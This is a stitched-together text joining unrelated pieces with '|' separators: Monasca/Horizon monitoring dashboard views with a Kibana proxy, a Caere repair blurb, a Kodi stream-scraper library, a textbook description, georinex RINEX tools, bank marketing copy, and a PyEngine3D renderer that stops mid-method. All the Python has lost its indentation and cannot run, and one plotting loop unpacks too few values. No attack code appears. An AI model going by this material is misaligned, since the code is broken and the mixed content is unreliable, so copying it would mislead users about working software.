status_index = 0
for a in alarms:
severity = alarm_tables.show_severity(a)
severity_index = index_by_severity.get(severity, None)
status_index = max(status_index, severity_index)
return priorities[status_index]['status']
def generate_status(request):
try:
alarms = api.monitor.alarm_list(request)
except Exception as e:
messages.error(request,
_('Unable to list alarms: %s') % str(e))
alarms = []
alarms_by_service = {}
for a in alarms:
service = alarm_tables.get_service(a)
service_alarms = alarms_by_service.setdefault(service, [])
service_alarms.append(a)
monitoring_services = copy.deepcopy(get_monitoring_services(request))
for row in monitoring_services:
row['name'] = str(row['name'])
if 'groupBy' in row:
alarms_by_group = {}
for a in alarms:
groups = show_by_dimension(a, row['groupBy'])
if groups:
for group in groups:
group_alarms = alarms_by_group.setdefault(group, [])
group_alarms.append(a)
services = []
for group, group_alarms in alarms_by_group.items():
name = '%s=%s' % (row['groupBy'], group)
# Encode as base64url to be able to include '/'
# encoding and decoding is required because of python3 compatibility
# urlsafe_b64encode requires byte-type text
name = 'b64:' + base64.urlsafe_b64encode(name.encode('utf-8')).decode('utf-8')
service = {
'display': group,
'name': name,
'class': get_status(group_alarms)
}
service['icon'] = get_icon(service['class'])
services.append(service)
row['services'] = services
else:
for service in row['services']:
service_alarms = alarms_by_service.get(service['name'], [])
service['class'] = get_status(service_alarms)
service['icon'] = get_icon(service['class'])
service['display'] = str(service['display'])
return monitoring_services
class IndexView(TemplateView):
template_name = constants.TEMPLATE_PREFIX + 'index.html'
def get_context_data(self, **kwargs):
if not policy.check((('monitoring', 'monitoring:monitoring'), ), self.request):
raise exceptions.NotAuthorized()
context = super(IndexView, self).get_context_data(**kwargs)
try:
region = self.request.user.services_region
context["grafana_url"] = getattr(settings, 'GRAFANA_URL').get(region, '')
except AttributeError:
# Catches case where Grafana 2 is not enabled.
proxy_url_path = str(reverse_lazy(constants.URL_PREFIX + 'proxy'))
api_root = self.request.build_absolute_uri(proxy_url_path)
context["api"] = api_root
context["dashboards"] = get_dashboard_links(self.request)
# Ensure all links have a 'raw' attribute
for link in context["dashboards"]:
link['raw'] = link.get('raw', False)
context['can_access_kibana'] = policy.check(
((getattr(settings, 'KIBANA_POLICY_SCOPE'), getattr(settings, 'KIBANA_POLICY_RULE')), ),
self.request
)
context['enable_log_management_button'] = settings.ENABLE_LOG_MANAGEMENT_BUTTON
context['enable_event_management_button'] = settings.ENABLE_EVENT_MANAGEMENT_BUTTON
context['show_grafana_home'] = settings.SHOW_GRAFANA_HOME
return context
class MonascaProxyView(TemplateView):
template_name = ""
def _convert_dimensions(self, req_kwargs):
"""Converts the dimension string service:monitoring into a dict
This method converts the dimension string
service:monitoring (requested by a query string arg)
into a python dict that looks like
{"service": "monitoring"} (used by monasca api calls)
"""
dim_dict = {}
if 'dimensions' in req_kwargs:
dimensions_str = req_kwargs['dimensions'][0]
dimensions_str_array = dimensions_str.split(',')
for dimension in dimensions_str_array:
# limit splitting since value may contain a ':' such as in
# the `url` dimension of the service_status check.
dimension_name_value = dimension.split(':', 1)
if len(dimension_name_value) == 2:
name = dimension_name_value[0]
value = dimension_name_value[1]
dim_dict[name] = urllib.parse.unquote(value)
else:
raise Exception('Dimensions are malformed')
#
# If the request specifies 'INJECT_REGION' as the region, we'll
# replace with the horizon scoped region. We can't do this by
# default, since some implementations don't publish region as a
# dimension for all metrics (mini-mon for one).
#
if 'region' in dim_dict and dim_dict['region'] == 'INJECT_REGION':
dim_dict['region'] = self.request.user.services_region
req_kwargs['dimensions'] = dim_dict
return req_kwargs
def get(self, request, *args, **kwargs):
# monasca_endpoint = api.monitor.monasca_endpoint(self.request)
restpath = self.kwargs['restpath']
results = None
parts = restpath.split('/')
if "metrics" == parts[0]:
req_kwargs = dict(self.request.GET)
self._convert_dimensions(req_kwargs)
if len(parts) == 1:
results = {'elements': api.monitor.
metrics_list(request,
**req_kwargs)}
elif "statistics" == parts[1]:
results = {'elements': api.monitor.
metrics_stat_list(request,
**req_kwargs)}
elif "measurements" == parts[1]:
results = {'elements': api.monitor.
metrics_measurement_list(request,
**req_kwargs)}
elif "dimensions" == parts[1]:
results = {'elements': api.monitor.
metrics_dimension_value_list(request,
**req_kwargs)}
if not results:
LOG.warning("There was a request made for the path %s that"
" is not supported." % restpath)
results = {}
return HttpResponse(json.dumps(results),
content_type='application/json')
class StatusView(TemplateView):
template_name = ""
def get(self, request, *args, **kwargs):
ret = {
'series': generate_status(self.request),
'settings': {}
}
return HttpResponse(json.dumps(ret),
content_type='application/json')
class _HttpMethodRequest(urllib.request.Request):
def __init__(self, method, url, **kwargs):
urllib.request.Request.__init__(self, url, **kwargs)
self.method = method
def get_method(self):
return self.method
def proxy_stream_generator(response):
while True:
chunk = response.read(1000 * 1024)
if not chunk:
break
yield chunk
class KibanaProxyView(generic.View):
base_url = None
http_method_names = ['GET', 'POST', 'PUT', 'DELETE', 'HEAD']
def read(self, method, url, data, headers):
proxy_request_url = self.get_absolute_url(url)
proxy_request = _HttpMethodRequest(
method, proxy_request_url, data=data, headers=headers
)
try:
response = urllib.request.urlopen(proxy_request)
except urllib.error.HTTPError as e:
return http.HttpResponse(
e.read(),
status=e.code,
content_type=e.hdrs['content-type']
)
except urllib.error.URLError as e:
return http.HttpResponse(e.reason, 404)
else:
status = response.getcode()
proxy_response = http.StreamingHttpResponse(
proxy_stream_generator(response),
status=status,
content_type=response.headers['content-type']
)
if 'set-cookie' in response.headers:
proxy_response['set-cookie'] = response.headers['set-cookie']
return proxy_response
@csrf_exempt
def dispatch(self, request, url):
if not url:
url = '/'
if request.method not in self.http_method_names:
return http.HttpResponseNotAllowed(request.method)
if not self._can_access_kibana():
error_msg = (_('User %s does not have sufficient '
'privileges to access Kibana')
% auth_utils.get_user(request))
LOG.error(error_msg)
return http.HttpResponseForbidden(content=error_msg)
# passing kbn version explicitly for kibana >= 4.3.x
headers = {
"X-Auth-Token": request.user.token.id,
"kbn-version": request.META.get("HTTP_KBN_VERSION", ""),
"Cookie": request.META.get("HTTP_COOKIE", ""),
"Content-Type": "application/json",
}
return self.read(request.method, url, request.body, headers)
def get_relative_url(self, url):
url = urllib.parse.quote(url.encode('utf-8'))
params_str = self.request.GET.urlencode()
if params_str:
return '{0}?{1}'.format(url, params_str)
return url
def get_absolute_url(self, url):
return self.base_url + self.get_relative_url(url).lstrip('/')
def _can_access_kibana(self):
return policy.check(
((getattr(settings, 'KIBANA_POLICY_SCOPE'), getattr(settings, 'KIBANA_POLICY_RULE')), ),
self.request
)
|
Ability to do Reverse Engineering on Caere units.
To send in your Caere unit for repair use the shipping address below.
If you have any technical questions or wish to offer technical information about any Caere units then fill out the form below. |
import boogietools as bt
import sys
import xbmcgui
class livelib():
def __init__(self):
self.timeout=None
def scrape(self,scraper,*args,**kwargs):
try:
module=__import__("scrapers",fromlist=[scraper])
scraper_function=getattr(module,scraper)
except Exception,e:
type="ERROR: LIVELIB | No scraper for %s"%scraper
result=e
return type,result
try:
type,result=scraper_function.run(*args,**kwargs)
except Exception,e:
type="ERROR: LIVELIB | Scraper \'%s\' can't scrape the service"%scraper
result=e
return type,result
header="*************** LIVELIB %s ARGUMENTS ***************"%type.upper()
print header
for k,v in result.iteritems():
print "%s:%s"%(k,str(v))
print "*"*len(header)
return type,result
def scrape_url(self,scraper,*args,**kwargs):
type,params=self.scrape(scraper,*args,**kwargs)
if "ERROR:" in type:
return type,params
if type in ["rtmp","rtmpe"]:
if "tcUrl" in params.keys():
url = self._escape_rtmp(params["tcUrl"])
params.pop("tcUrl")
if not self.timeout is None:
params["timeout"]=self.timeout
for k,v in params.iteritems():
if k=="conn":
for kc in sorted(v.keys()):
url+=" conn=%s"%self._escape_rtmp(v[kc])
continue
url+=" %s=%s"%(k,self._escape_rtmp(v))
return type,url
else:
return "ERROR: LIVELIB | Can't detect stream type %s"%type,""
if type in ["m3u","m3u8"]:
return type,params
def scrape_li(self,scraper,*args,**kwargs):
type,params=self.scrape(scraper,*args,**kwargs)
if "ERROR:" in type:
return type,params
if type in ["rtmp","rtmpe"]:
item = xbmcgui.ListItem(path=str(params["tcUrl"]))
params.pop("tcUrl")
for k,v in params.iteritems():
item.setProperty(str(k), str(v))
return type,item
else:
return "ERROR: LIVELIB | Can't convert stream type %s to ListItem"%type,None
def _escape_rtmp(self,s):
s=str(s)
escaped=[" ","?","&"]
for c in escaped:
if c in s:
s=s.replace(c,"\\%s"%hex(ord(c))[2:])
return s |
Exercises in Media Writing offers students multiple opportunities to practice their writing skills in-class or as take-home assignments. Each chapter includes review questions and writing-prompt activities to help students master the concepts and skills presented in Vincent F. Filak’s second edition of Dynamics of Media Writing. Additional exercises built around the unique demands of online newswriting will prepare students to meet the demands of a changing media landscape. Key Features: Review Questions help students recall and master core chapter concepts Writing Exercises enable students to recall and demonstrate their understanding of various elements found in each chapter in Dynamics of Media Writing, Second Edition. |
import argparse
from pathlib import Path
import numpy as np
from datetime import timedelta
import logging
import georinex as gr
def georinex_read():
"""
Reads RINEX 2/3 OBS/NAV file and plot (or convert to NetCDF4 / HDF5).
Returns data as xarray.Dataset, think of it like an N-dimensional Numpy NDarray with lots of metadata and
very fancy indexing methods.
Xarray can be thought of as an analytically-tuned Pandas.
The RINEX version is automatically detected.
Compressed RINEX files including:
* GZIP .gz
* ZIP .zip
* LZW .Z
* Hatanaka .crx / .crx.gz
are handled seamlessly via TextIO stream.
Examples:
# read RINEX files (NAV/OBS, Rinex 2 or 3, Hatanaka, etc.)
georinex_read ~/data/VEN100ITA_R_20181580000_01D_MN.rnx.gz
georinex_read ~/data/ABMF00GLP_R_20181330000_01D_30S_MO.zip
# read a limited range of time in a RINEX file
georinex_read ~/data/PUMO00CR__R_20180010000_01D_15S_MO.rnx -t 2018-01-01 2018-01-01T00:30
"""
p = argparse.ArgumentParser(
description="example of reading RINEX 2/3 Navigation/Observation file"
)
p.add_argument("rinexfn", help="path to RINEX 2 or RINEX 3 file")
p.add_argument("-o", "--out", help="write data to path or file as NetCDF4")
p.add_argument("-v", "--verbose", action="store_true")
p.add_argument("-p", "--plot", help="display plots", action="store_true")
p.add_argument("-u", "--use", help="select which GNSS system(s) to use", nargs="+")
p.add_argument("-m", "--meas", help="select which GNSS measurement(s) to use", nargs="+")
p.add_argument("-t", "--tlim", help="specify time limits (process part of file)", nargs=2)
p.add_argument(
"-useindicators",
help="use SSI, LLI indicators (signal, loss of lock)",
action="store_true",
)
p.add_argument(
"-strict",
help="do not use speculative preallocation (slow) let us know if this is needed",
action="store_false",
)
p.add_argument("-interval", help="read the rinex file only every N seconds", type=float)
P = p.parse_args()
data = gr.load(
P.rinexfn,
P.out,
use=P.use,
tlim=P.tlim,
useindicators=P.useindicators,
meas=P.meas,
verbose=P.verbose,
fast=P.strict,
interval=P.interval,
)
# %% plots
if P.plot:
import georinex.plots as grp
from matplotlib.pyplot import show
grp.timeseries(data)
show()
else:
print(data)
def georinex_plot():
"""
PyRINEX plotting example
includes how to index by satellite, measurement type and time
"""
import matplotlib.dates as md
from matplotlib.pyplot import figure, show
p = argparse.ArgumentParser(description="Plot raw Rinex data")
p.add_argument("rinexfn", help="RINEX file to analyze")
p.add_argument("sv", help="SVs to analyze e.g. G14 C12", nargs="+")
p.add_argument(
"-t",
"--tlim",
help="time limits (start stop) e.g. 2017-05-25T12:47 2017-05-25T13:05",
nargs=2,
)
p.add_argument(
"-w", "--what", help="what measurements to plot e.g. L1C", nargs="+", default=["L1C", "P1"]
)
P = p.parse_args()
rinexfn = Path(P.rinexfn).expanduser()
obs = gr.load(rinexfn, use="G")
# %% optional time indexing demo
# can use datetime or string
# boolean indexing -- set "i=slice(None)" to disable time indexing.
if P.tlim is not None:
i = (obs.time >= np.datetime64(P.tlim[0])) & (obs.time <= np.datetime64(P.tlim[1]))
else:
i = slice(None)
# %% plot
SV = P.sv
what = P.what
# FIXME: make these title automatic based on requested measurement?
# titles = ['Psedoranges of GPS and Glonass', 'Carrier Phase', 'Doppler', 'Signal Strength']
# ylabels = ['Pseudoranges', 'Phase', 'Doppler', 'signal strength']
fg = figure(figsize=(9, 9))
axs = fg.subplots(4, 1, sharex=True)
for v, title, ylabel, ax in zip(what, axs):
if v not in obs:
continue
Satobs = obs[v][i].sel(sv=SV).dropna(dim="time", how="all")
Satobs.plot(ax=ax)
ax.set_title(title)
ax.set_ylabel(ylabel)
ax.legend(loc="center left", bbox_to_anchor=(1, 0.5))
axs[-1].set_xlabel("Time [UTC]")
axs[-1].xaxis.set_major_formatter(md.DateFormatter("%Y-%m-%dT%H:%M"))
fg.suptitle(f"{rinexfn.name} satellite {SV}")
show()
def rinex2hdf5():
"""
Converts RINEX 2/3 NAV/OBS to NetCDF4 / HDF5
The RINEX version is automatically detected.
Compressed RINEX files including:
* GZIP .gz
* ZIP .zip
* LZW .Z
* Hatanaka .crx / .crx.gz
are handled seamlessly via TextIO stream.
Examples:
# batch convert RINEX OBS2 to NetCDF4/HDF5
rnx2hdf5.py ~/data "*o"
rnx2hdf5.py ~/data "*o.Z"
rnx2hdf5.py ~/data "*o.zip"
# batch convert RINEX OBS3 to NetCDF4/HDF5
rnx2hdf5.py ~/data "*MO.rnx"
rnx2hdf5.py ~/data "*MO.rnx.gz"
# batch convert compressed Hatanaka RINEX files to NetCDF4 / HDF5
rnx2hdf5.py ~/data "*.crx.gz"
"""
p = argparse.ArgumentParser(
description="example of reading RINEX 2/3 Navigation/Observation file"
)
p.add_argument("indir", help="path to RINEX 2 or RINEX 3 files to convert")
p.add_argument("glob", help="file glob pattern", nargs="?", default="*")
p.add_argument("-o", "--out", help="write data to path or file as NetCDF4")
p.add_argument("-v", "--verbose", action="store_true")
p.add_argument("-p", "--plot", help="display plots", action="store_true")
p.add_argument("-u", "--use", help="select which GNSS system(s) to use", nargs="+")
p.add_argument("-m", "--meas", help="select which GNSS measurement(s) to use", nargs="+")
p.add_argument("-t", "--tlim", help="specify time limits (process part of file)", nargs=2)
p.add_argument(
"-useindicators",
help="use SSI, LLI indicators (signal, loss of lock)",
action="store_true",
)
p.add_argument(
"-strict",
help="do not use speculative preallocation (slow) let us know if this is needed",
action="store_false",
)
P = p.parse_args()
gr.batch_convert(
P.indir,
P.glob,
P.out,
use=P.use,
tlim=P.tlim,
useindicators=P.useindicators,
meas=P.meas,
verbose=P.verbose,
fast=P.strict,
)
def georinex_time():
p = argparse.ArgumentParser()
p.add_argument("filename", help="RINEX filename to get times from")
p.add_argument("-glob", help="file glob pattern", nargs="+", default="*")
p.add_argument("-v", "--verbose", action="store_true")
p = p.parse_args()
filename = Path(p.filename).expanduser()
print("filename: start, stop, number of times, interval")
if filename.is_dir():
flist = gr.globber(filename, p.glob)
for f in flist:
eachfile(f, p.verbose)
elif filename.is_file():
eachfile(filename, p.verbose)
else:
raise FileNotFoundError(f"{filename} is not a path or file")
def eachfile(fn: Path, verbose: bool = False):
try:
times = gr.gettime(fn)
except ValueError as e:
if verbose:
print(f"{fn.name}: {e}")
return
# %% output
Ntimes = times.size
if Ntimes == 0:
return
ostr = f"{fn.name}:" f" {times[0].isoformat()}" f" {times[-1].isoformat()}" f" {Ntimes}"
hdr = gr.rinexheader(fn)
interval = hdr.get("interval", np.nan)
if ~np.isnan(interval):
ostr += f" {interval}"
Nexpect = (times[-1] - times[0]) // timedelta(seconds=interval) + 1
if Nexpect != Ntimes:
logging.warning(f"{fn.name}: expected {Nexpect} but got {Ntimes} times")
print(ostr)
if verbose:
print(times)
def georinex_loc():
"""
Visualize location of all receivers on map,
where color & size are proportional to measurement interval (smaller is better)
"""
from matplotlib.pyplot import show
import georinex.plots_geo as grp
import georinex.geo as gg
p = argparse.ArgumentParser(description="plot receiver locations")
p.add_argument("indir", help="path to RINEX 2 or RINEX 3 files")
p.add_argument(
"-glob",
help="file glob pattern",
nargs="+",
default=["*o", "*O.rnx", "*O.rnx.gz", "*O.crx", "*O.crx.gz"],
)
p = p.parse_args()
indir = Path(p.indir).expanduser()
flist = gr.globber(indir, p.glob)
locs = gg.get_locations(flist)
grp.receiver_locations(locs)
show()
|
80 million American Millennials are poised to transform banking forever. They present a once-in-a-generation opportunity for community banks to show how they understand, value and embrace this new generation.
Since over 80 percent of Millennials ranked a quality mobile banking app as a must have, we created a branded, mobile package for the bank marketed through digital advertising that included Pay Per Click, banner ads and a pre roll video ad on Facebook. We also used traditional channels including outdoor, radio and in branch to round out the media mix.
In just six weeks, the CBT Gen Y campaign drove over 10,000 potential new customers to a responsive landing page that led them along the sales path. Retargeting will keep them coming back.
As revealed in "Inside the Millennial Mind," many brands are missing the point by continuing to push traditional life markers such as getting married, buying a home and starting a family, because that was what drove older generations' purchasing habits. Millennials rank inward-focused values like happiness and discovery higher than collective-focused values. |
from ctypes import c_void_p
import math
import numpy as np
from OpenGL.GL import *
from OpenGL.GLU import *
from PyEngine3D.Common import logger, COMMAND
from PyEngine3D.Common.Constants import *
from PyEngine3D.Utilities import *
from PyEngine3D.OpenGLContext import InstanceBuffer, FrameBufferManager, RenderBuffer, UniformBlock, CreateTexture
from .PostProcess import AntiAliasing, PostProcess
from . import RenderTargets, RenderOption, RenderingType, RenderGroup, RenderMode
from . import SkeletonActor, StaticActor, ScreenQuad, Line
from . import Spline3D
class Renderer(Singleton):
def __init__(self):
self.initialized = False
self.view_mode = GL_FILL
# managers
self.core_manager = None
self.viewport_manager = None
self.resource_manager = None
self.font_manager = None
self.scene_manager = None
self.debug_line_manager = None
self.render_option_manager = None
self.rendertarget_manager = None
self.framebuffer_manager = None
self.postprocess = None
# components
self.viewport = None
self.debug_texture = None
self.blend_enable = False
self.blend_equation = GL_FUNC_ADD
self.blend_func_src = GL_SRC_ALPHA
self.blend_func_dst = GL_ONE_MINUS_SRC_ALPHA
self.blend_enable_prev = self.blend_enable
self.blend_equation_prev = self.blend_equation
self.blend_func_src_prev = self.blend_func_src
self.blend_func_dst_prev = self.blend_func_dst
# scene constants uniform buffer
self.uniform_scene_buffer = None
self.uniform_scene_data = None
self.uniform_view_buffer = None
self.uniform_view_data = None
self.uniform_view_projection_buffer = None
self.uniform_view_projection_data = None
self.uniform_light_buffer = None
self.uniform_light_data = None
self.uniform_point_light_buffer = None
self.uniform_point_light_data = None
self.uniform_particle_common_buffer = None
self.uniform_particle_common_data = None
self.uniform_particle_infos_buffer = None
self.uniform_particle_infos_data = None
# material instances
self.scene_constants_material = None
self.debug_bone_material = None
self.shadowmap_material = None
self.shadowmap_skeletal_material = None
self.static_object_id_material = None
self.skeletal_object_id_material = None
self.selcted_static_object_material = None
self.selcted_skeletal_object_material = None
self.selcted_object_composite_material = None
self.render_color_material = None
self.render_heightmap_material = None
# font
self.font_instance_buffer = None
self.font_shader = None
self.actor_instance_buffer = None
self.render_custom_translucent_callbacks = []
def initialize(self, core_manager):
logger.info("Initialize Renderer")
self.core_manager = core_manager
self.viewport_manager = core_manager.viewport_manager
self.viewport = self.viewport_manager.main_viewport
self.resource_manager = core_manager.resource_manager
self.render_option_manager = core_manager.render_option_manager
self.font_manager = core_manager.font_manager
self.scene_manager = core_manager.scene_manager
self.debug_line_manager = core_manager.debug_line_manager
self.rendertarget_manager = core_manager.rendertarget_manager
self.postprocess = PostProcess()
self.postprocess.initialize()
self.framebuffer_manager = FrameBufferManager.instance()
# material instances
self.scene_constants_material = self.resource_manager.get_material_instance('scene_constants_main')
self.debug_bone_material = self.resource_manager.get_material_instance("debug_bone")
self.shadowmap_material = self.resource_manager.get_material_instance("shadowmap")
self.shadowmap_skeletal_material = self.resource_manager.get_material_instance(name="shadowmap_skeletal",
shader_name="shadowmap",
macros={"SKELETAL": 1})
self.static_object_id_material = self.resource_manager.get_material_instance(name="render_static_object_id",
shader_name="render_object_id")
self.skeletal_object_id_material = self.resource_manager.get_material_instance(name="render_skeletal_object_id",
shader_name="render_object_id",
macros={"SKELETAL": 1})
self.selcted_static_object_material = self.resource_manager.get_material_instance("selected_object")
self.selcted_skeletal_object_material = self.resource_manager.get_material_instance(name="selected_object_skeletal",
shader_name="selected_object",
macros={"SKELETAL": 1})
self.selcted_object_composite_material = self.resource_manager.get_material_instance("selected_object_composite")
self.render_color_material = self.resource_manager.get_material_instance(name="render_object_color", shader_name="render_object_color")
self.render_heightmap_material = self.resource_manager.get_material_instance(name="render_heightmap", shader_name="render_heightmap")
# font
self.font_shader = self.resource_manager.get_material_instance("font")
self.font_instance_buffer = InstanceBuffer(name="font_offset", location_offset=1, element_datas=[FLOAT4_ZERO, ])
# instance buffer
self.actor_instance_buffer = InstanceBuffer(name="actor_instance_buffer", location_offset=7, element_datas=[MATRIX4_IDENTITY, ])
# scene constants uniform buffer
program = self.scene_constants_material.get_program()
self.uniform_scene_data = np.zeros(1, dtype=[('TIME', np.float32),
('JITTER_FRAME', np.float32),
('RENDER_SSR', np.int32),
('RENDER_SSAO', np.int32),
('SCREEN_SIZE', np.float32, 2),
('BACKBUFFER_SIZE', np.float32, 2),
('MOUSE_POS', np.float32, 2),
('DELTA_TIME', np.float32),
('SCENE_DUMMY_0', np.int32)])
self.uniform_scene_buffer = UniformBlock("scene_constants", program, 0, self.uniform_scene_data)
self.uniform_view_data = np.zeros(1, dtype=[('VIEW', np.float32, (4, 4)),
('INV_VIEW', np.float32, (4, 4)),
('VIEW_ORIGIN', np.float32, (4, 4)),
('INV_VIEW_ORIGIN', np.float32, (4, 4)),
('PROJECTION', np.float32, (4, 4)),
('INV_PROJECTION', np.float32, (4, 4)),
('CAMERA_POSITION', np.float32, 3),
('VIEW_DUMMY_0', np.float32),
('NEAR_FAR', np.float32, 2),
('JITTER_DELTA', np.float32, 2),
('JITTER_OFFSET', np.float32, 2),
('VIEWCONSTANTS_DUMMY0', np.float32, 2)])
self.uniform_view_buffer = UniformBlock("view_constants", program, 1, self.uniform_view_data)
self.uniform_view_projection_data = np.zeros(1, dtype=[('VIEW_PROJECTION', np.float32, (4, 4)),
('PREV_VIEW_PROJECTION', np.float32, (4, 4))])
self.uniform_view_projection_buffer = UniformBlock("view_projection", program, 2,
self.uniform_view_projection_data)
self.uniform_light_data = np.zeros(1, dtype=[('SHADOW_MATRIX', np.float32, (4, 4)),
('LIGHT_POSITION', np.float32, 3),
('SHADOW_EXP', np.float32),
('LIGHT_DIRECTION', np.float32, 3),
('SHADOW_BIAS', np.float32),
('LIGHT_COLOR', np.float32, 3),
('SHADOW_SAMPLES', np.int32)])
self.uniform_light_buffer = UniformBlock("light_constants", program, 3, self.uniform_light_data)
self.uniform_point_light_data = np.zeros(MAX_POINT_LIGHTS, dtype=[('color', np.float32, 3),
('radius', np.float32),
('pos', np.float32, 3),
('render', np.float32)])
self.uniform_point_light_buffer = UniformBlock("point_light_constants", program, 4, self.uniform_point_light_data)
self.uniform_particle_common_data = np.zeros(1, dtype=[
('PARTICLE_COLOR', np.float32, 3),
('PARTICLE_ALIGN_MODE', np.int32),
('PARTICLE_CELL_COUNT', np.int32, 2),
('PARTICLE_BLEND_MODE', np.int32),
('PARTICLE_COMMON_DUMMY_0', np.int32)
])
self.uniform_particle_common_buffer = UniformBlock("particle_common", program, 5, self.uniform_particle_common_data)
self.uniform_particle_infos_data = np.zeros(1, dtype=[
('PARTICLE_PARENT_MATRIX', np.float32, (4, 4)),
('PARTICLE_DELAY', np.float32, 2),
('PARTICLE_LIFE_TIME', np.float32, 2),
('PARTICLE_TRANSFORM_ROTATION_MIN', np.float32, 3),
('PARTICLE_FADE_IN', np.float32),
('PARTICLE_TRANSFORM_ROTATION_MAX', np.float32, 3),
('PARTICLE_FADE_OUT', np.float32),
('PARTICLE_TRANSFORM_SCALE_MIN', np.float32, 3),
('PARTICLE_OPACITY', np.float32),
('PARTICLE_TRANSFORM_SCALE_MAX', np.float32, 3),
('PARTICLE_ENABLE_VECTOR_FIELD', np.int32),
('PARTICLE_VELOCITY_POSITION_MIN', np.float32, 3),
('PARTICLE_VECTOR_FIELD_STRENGTH', np.float32),
('PARTICLE_VELOCITY_POSITION_MAX', np.float32, 3),
('PARTICLE_VECTOR_FIELD_TIGHTNESS', np.float32),
('PARTICLE_VELOCITY_ROTATION_MIN', np.float32, 3),
('PARTICLE_MAX_COUNT', np.uint32),
('PARTICLE_VELOCITY_ROTATION_MAX', np.float32, 3),
('PARTICLE_SPAWN_COUNT', np.uint32),
('PARTICLE_VELOCITY_SCALE_MIN', np.float32, 3),
('PARTICLE_VELOCITY_STRETCH', np.float32),
('PARTICLE_VELOCITY_SCALE_MAX', np.float32, 3),
('PARTICLE_VELOCITY_ACCELERATION', np.float32),
('PARTICLE_VECTOR_FIELD_MATRIX', np.float32, (4, 4)),
('PARTICLE_VECTOR_FIELD_INV_MATRIX', np.float32, (4, 4)),
('PARTICLE_SPAWN_VOLUME_INFO', np.float32, 3),
('PARTICLE_SPAWN_VOLUME_TYPE', np.uint32),
('PARTICLE_SPAWN_VOLUME_MATRIX', np.float32, (4, 4)),
('PARTICLE_VELOCITY_LIMIT', np.float32, 2),
('PARTICLE_FORCE_GRAVITY', np.float32),
('PARTICLE_PLAY_SPEED', np.float32),
('PARTICLE_VELOCITY_TYPE', np.uint32),
('PARTICLE_FORCE_ELASTICITY', np.float32),
('PARTICLE_FORCE_FRICTION', np.float32),
('PARTICLE_DUMMY_0', np.uint32),
])
self.uniform_particle_infos_buffer = UniformBlock("particle_infos", program, 6, self.uniform_particle_infos_data)
def get_rendering_type_name(rendering_type):
rendering_type = str(rendering_type)
return rendering_type.split('.')[-1] if '.' in rendering_type else rendering_type
rendering_type_list = [get_rendering_type_name(RenderingType.convert_index_to_enum(x)) for x in range(RenderingType.COUNT.value)]
self.initialized = True
# Send to GUI
self.core_manager.send_rendering_type_list(rendering_type_list)
def close(self):
pass
def render_custom_translucent(self, render_custom_translucent_callback):
self.render_custom_translucent_callbacks.append(render_custom_translucent_callback)
def set_blend_state(self, blend_enable=True, equation=GL_FUNC_ADD, func_src=GL_SRC_ALPHA, func_dst=GL_ONE_MINUS_SRC_ALPHA):
self.blend_enable_prev = self.blend_enable
self.blend_equation_prev = self.blend_equation
self.blend_func_src_prev = self.blend_func_src
self.blend_func_dst_prev = self.blend_func_dst
self.blend_enable = blend_enable
if blend_enable:
self.blend_equation = equation
self.blend_func_src = func_src
self.blend_func_dst = func_dst
glEnable(GL_BLEND)
glBlendEquation(equation)
glBlendFunc(func_src, func_dst)
else:
glDisable(GL_BLEND)
def restore_blend_state_prev(self):
self.set_blend_state(self.blend_enable_prev,
self.blend_equation_prev,
self.blend_func_src_prev,
self.blend_func_dst_prev)
def set_view_mode(self, view_mode):
if view_mode == COMMAND.VIEWMODE_WIREFRAME:
self.view_mode = GL_LINE
elif view_mode == COMMAND.VIEWMODE_SHADING:
self.view_mode = GL_FILL
def reset_renderer(self):
self.scene_manager.update_camera_projection_matrix(aspect=self.core_manager.game_backend.aspect)
self.framebuffer_manager.clear_framebuffer()
self.rendertarget_manager.create_rendertargets()
self.scene_manager.reset_light_probe()
self.core_manager.gc_collect()
def ortho_view(self, look_at=True):
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glOrtho(0, self.viewport.width, 0, self.viewport.height, -1, 1)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
if look_at:
self.look_at()
def perspective_view(self, look_at=True):
camera = self.scene_manager.main_camera
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluPerspective(camera.fov, camera.aspect, camera.near, camera.far)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
if look_at:
self.look_at()
def look_at(self):
camera = self.scene_manager.main_camera
camera_target = -camera.transform.front
camera_up = camera.transform.up
glScalef(*(1.0 / camera.transform.get_scale()))
gluLookAt(0.0, 0.0, 0.0, *camera_target, *camera_up)
glTranslatef(*(-camera.transform.get_pos()))
def set_debug_texture(self, texture):
if texture is not None and texture is not RenderTargets.BACKBUFFER and type(texture) != RenderBuffer:
self.debug_texture = texture
self.postprocess.is_render_material_instance = False
logger.info("Current texture : %s" % self.debug_texture.name)
else:
self.debug_texture = None
def bind_uniform_blocks(self):
camera = self.scene_manager.main_camera
main_light = self.scene_manager.main_light
if not camera or not main_light:
return
frame_count = self.core_manager.frame_count % 16
uniform_data = self.uniform_scene_data
uniform_data['TIME'] = self.core_manager.current_time
uniform_data['JITTER_FRAME'] = frame_count
uniform_data['RENDER_SSR'] = self.postprocess.is_render_ssr
uniform_data['RENDER_SSAO'] = self.postprocess.is_render_ssao
uniform_data['SCREEN_SIZE'] = (self.core_manager.game_backend.width, self.core_manager.game_backend.height)
uniform_data['BACKBUFFER_SIZE'] = (RenderTargets.BACKBUFFER.width, RenderTargets.BACKBUFFER.height)
uniform_data['MOUSE_POS'] = self.core_manager.get_mouse_pos()
uniform_data['DELTA_TIME'] = self.core_manager.delta
self.uniform_scene_buffer.bind_uniform_block(data=uniform_data)
uniform_data = self.uniform_view_data
uniform_data['VIEW'][...] = camera.view
uniform_data['INV_VIEW'][...] = camera.inv_view
uniform_data['VIEW_ORIGIN'][...] = camera.view_origin
uniform_data['INV_VIEW_ORIGIN'][...] = camera.inv_view_origin
uniform_data['PROJECTION'][...] = camera.projection_jitter
uniform_data['INV_PROJECTION'][...] = camera.inv_projection_jitter
uniform_data['CAMERA_POSITION'][...] = camera.transform.get_pos()
uniform_data['NEAR_FAR'][...] = (camera.near, camera.far)
uniform_data['JITTER_DELTA'][...] = self.postprocess.jitter_delta
uniform_data['JITTER_OFFSET'][...] = self.postprocess.jitter
self.uniform_view_buffer.bind_uniform_block(data=uniform_data)
uniform_data = self.uniform_light_data
uniform_data['SHADOW_MATRIX'][...] = main_light.shadow_view_projection
uniform_data['SHADOW_EXP'] = main_light.shadow_exp
uniform_data['SHADOW_BIAS'] = main_light.shadow_bias
uniform_data['SHADOW_SAMPLES'] = main_light.shadow_samples
uniform_data['LIGHT_POSITION'][...] = main_light.transform.get_pos()
